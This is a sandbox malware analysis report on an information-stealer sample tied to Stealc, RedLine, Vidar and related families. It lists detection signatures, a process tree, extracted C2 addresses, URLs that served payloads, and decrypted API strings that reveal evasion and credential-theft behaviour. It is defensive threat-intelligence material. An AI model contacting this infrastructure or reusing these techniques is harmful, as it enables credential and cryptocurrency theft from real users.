Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
g77dRQ1Csm.exe

Overview

General Information

Sample name:g77dRQ1Csm.exe
renamed because original name is a hash value
Original sample name:41de8e3e7412b6e97b60fdbfdd24b0ba.exe
Analysis ID:1431471
MD5:41de8e3e7412b6e97b60fdbfdd24b0ba
SHA1:fa48e5a86b5f2b04b79f6c3459339a16c2db6aaa
SHA256:480b540cb344d74306d03347658b2018a4b8504f4055ad15ba43456953d7b33c
Tags:32exeStealctrojan
Infos:

Detection

Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Mars stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
Yara detected Vidar stealer
Yara detected zgRAT
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Connects to many ports of the same IP (likely port scanning)
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking locale)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • g77dRQ1Csm.exe (PID: 5288 cmdline: "C:\Users\user\Desktop\g77dRQ1Csm.exe" MD5: 41DE8E3E7412B6E97B60FDBFDD24B0BA)
    • u42w.0.exe (PID: 1720 cmdline: "C:\Users\user\AppData\Local\Temp\u42w.0.exe" MD5: A0E6719CEB3DC236283AB59B7F39B058)
      • cmd.exe (PID: 8040 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • FCBAECGIEB.exe (PID: 8128 cmdline: "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe" MD5: 6C93FC68E2F01C20FB81AF24470B790C)
      • WerFault.exe (PID: 8136 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 2332 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • run.exe (PID: 2004 cmdline: "C:\Users\user\AppData\Local\Temp\u42w.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
      • cmd.exe (PID: 5424 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • MSBuild.exe (PID: 7888 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • u42w.3.exe (PID: 5180 cmdline: "C:\Users\user\AppData\Local\Temp\u42w.3.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)
      • SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 MD5: 8E9C467EAC35B35DA1F586014F29C330)
    • WerFault.exe (PID: 7212 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1180 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • run.exe (PID: 7872 cmdline: "C:\Users\user\AppData\Local\Temp\u42w.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
    • cmd.exe (PID: 7904 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 7672 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}
{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\cqecfsbeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\Users\user\AppData\Local\Temp\cqecfsbeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        C:\Users\user\AppData\Local\Temp\cqecfsbeMALWARE_Win_Arechclient2Detects Arechclient2 RATditekSHen
        • 0xb864a:$s14: keybd_event
        • 0xbf3b9:$v1_1: grabber@
        • 0xb921c:$v1_2: <BrowserProfile>k__
        • 0xb9c95:$v1_3: <SystemHardwares>k__
        • 0xb9d54:$v1_5: <ScannedWallets>k__
        • 0xb9de4:$v1_6: <DicrFiles>k__
        • 0xb9dc0:$v1_7: <MessageClientFiles>k__
        • 0xba18a:$v1_8: <ScanBrowsers>k__BackingField
        • 0xba1dc:$v1_8: <ScanWallets>k__BackingField
        • 0xba1f9:$v1_8: <ScanScreen>k__BackingField
        • 0xba233:$v1_8: <ScanVPN>k__BackingField
        • 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
        • 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
        C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdgJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdgJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            00000005.00000000.1772107020.0000000000401000.00000020.00000001.01000000.0000000C.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                00000003.00000002.2055548397.0000000005E10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  00000003.00000002.2055548397.0000000005E10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      Click to see the 38 entries
                      SourceRuleDescriptionAuthorStrings
                      1.3.u42w.0.exe.2f00000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        1.3.u42w.0.exe.2f00000.0.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                          1.2.u42w.0.exe.2ed0e67.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                            1.2.u42w.0.exe.2ed0e67.1.raw.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                              3.2.cmd.exe.5e100c8.8.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                                Click to see the 73 entries
                                No Sigma rule has matched
                                No Snort rule has matched

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: http://185.172.128.59/syncUpd.exeAvira URL Cloud: Label: malware
                                Source: http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0Avira URL Cloud: Label: malware
                                Source: http://185.172.128.203/tiktok.exeAvira URL Cloud: Label: malware
                                Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdgAvira: detection malicious, Label: HEUR/AGEN.1307453
                                Source: C:\Users\user\AppData\Local\Temp\cqecfsbeAvira: detection malicious, Label: HEUR/AGEN.1307453
                                Source: 00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
                                Source: u42w.0.exe.1720.1.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}
                                Source: http://185.172.128.76/3cd2b41cbde8fc9c.phpVirustotal: Detection: 13%Perma Link
                                Source: http://185.172.128.228/BroomSetup.exeVirustotal: Detection: 22%Perma Link
                                Source: 185.172.128.76/3cd2b41cbde8fc9c.phpVirustotal: Detection: 13%Perma Link
                                Source: http://185.172.128.76/15f649199f40275b/mozglue.dll5Virustotal: Detection: 5%Perma Link
                                Source: http://185.172.128.76/15f649199f40275b/sqlite3.dllVirustotal: Detection: 8%Perma Link
                                Source: http://185.172.128.59/syncUpd.exeVirustotal: Detection: 22%Perma Link
                                Source: http://185.172.128.76Virustotal: Detection: 9%Perma Link
                                Source: http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0Virustotal: Detection: 20%Perma Link
                                Source: http://185.172.128.203/tiktok.exeVirustotal: Detection: 19%Perma Link
                                Source: http://185.172.128.203/tiktok.exe00Virustotal: Detection: 15%Perma Link
                                Source: http://185.172.128.76/15f649199f40275b/softokn3.dllIVirustotal: Detection: 5%Perma Link
                                Source: http://185.172.128.76/15f649199f40275b/sqlite3.dll9Virustotal: Detection: 7%Perma Link
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exeReversingLabs: Detection: 20%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exeVirustotal: Detection: 38%Perma Link
                                Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exeReversingLabs: Detection: 20%
                                Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exeVirustotal: Detection: 38%Perma Link
                                Source: C:\Users\user\AppData\Local\Temp\cqecfsbeReversingLabs: Detection: 56%
                                Source: C:\Users\user\AppData\Local\Temp\cqecfsbeVirustotal: Detection: 60%Perma Link
                                Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdgReversingLabs: Detection: 56%
                                Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdgVirustotal: Detection: 60%Perma Link
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeVirustotal: Detection: 42%Perma Link
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\UIxMarketPlugin.dllReversingLabs: Detection: 18%
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\UIxMarketPlugin.dllVirustotal: Detection: 12%Perma Link
                                Source: g77dRQ1Csm.exeVirustotal: Detection: 40%Perma Link
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdgJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\cqecfsbeJoe Sandbox ML: detected
                                Source: g77dRQ1Csm.exeJoe Sandbox ML: detected
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: INSERT_KEY_HERE
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetProcAddress
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: LoadLibraryA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: lstrcatA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: OpenEventA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CreateEventA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CloseHandle
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Sleep
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetUserDefaultLangID
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: VirtualAllocExNuma
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: VirtualFree
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetSystemInfo
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: VirtualAlloc
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: HeapAlloc
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetComputerNameA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: lstrcpyA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetProcessHeap
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetCurrentProcess
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: lstrlenA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: ExitProcess
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GlobalMemoryStatusEx
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetSystemTime
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: SystemTimeToFileTime
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: advapi32.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: gdi32.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: user32.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: crypt32.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: ntdll.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetUserNameA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CreateDCA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetDeviceCaps
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: ReleaseDC
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CryptStringToBinaryA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: sscanf
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: VMwareVMware
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: HAL9TH
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: JohnDoe
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: DISPLAY
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: %hu/%hu/%hu
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: http://185.172.128.76
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: /3cd2b41cbde8fc9c.php
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: /15f649199f40275b/
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: default10
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetEnvironmentVariableA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetFileAttributesA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GlobalLock
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: HeapFree
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetFileSize
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GlobalSize
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CreateToolhelp32Snapshot
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: IsWow64Process
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Process32Next
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetLocalTime
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: FreeLibrary
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetTimeZoneInformation
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetSystemPowerStatus
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetVolumeInformationA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetWindowsDirectoryA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Process32First
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetLocaleInfoA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetUserDefaultLocaleName
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetModuleFileNameA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: DeleteFileA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: FindNextFileA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: LocalFree
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: FindClose
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: SetEnvironmentVariableA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: LocalAlloc
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetFileSizeEx
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: ReadFile
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: SetFilePointer
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: WriteFile
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CreateFileA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: FindFirstFileA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CopyFileA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: VirtualProtect
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetLastError
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: lstrcpynA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: MultiByteToWideChar
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GlobalFree
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: WideCharToMultiByte
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GlobalAlloc
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: OpenProcess
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: TerminateProcess
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetCurrentProcessId
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: gdiplus.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: ole32.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: bcrypt.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: wininet.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: shlwapi.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: shell32.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: psapi.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: rstrtmgr.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CreateCompatibleBitmap
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: SelectObject
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: BitBlt
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: DeleteObject
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CreateCompatibleDC
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GdipGetImageEncodersSize
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GdipGetImageEncoders
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GdiplusStartup
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GdiplusShutdown
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GdipSaveImageToStream
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GdipDisposeImage
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GdipFree
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetHGlobalFromStream
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CreateStreamOnHGlobal
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CoUninitialize
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CoInitialize
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CoCreateInstance
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: BCryptDecrypt
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: BCryptSetProperty
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: BCryptDestroyKey
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetWindowRect
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetDesktopWindow
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetDC
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CloseWindow
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: wsprintfA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: EnumDisplayDevicesA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetKeyboardLayoutList
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CharToOemW
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: wsprintfW
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: RegQueryValueExA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: RegEnumKeyExA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: RegOpenKeyExA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: RegCloseKey
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: RegEnumValueA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CryptBinaryToStringA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CryptUnprotectData
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: SHGetFolderPathA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: ShellExecuteExA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: InternetOpenUrlA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: InternetConnectA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: InternetCloseHandle
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: InternetOpenA
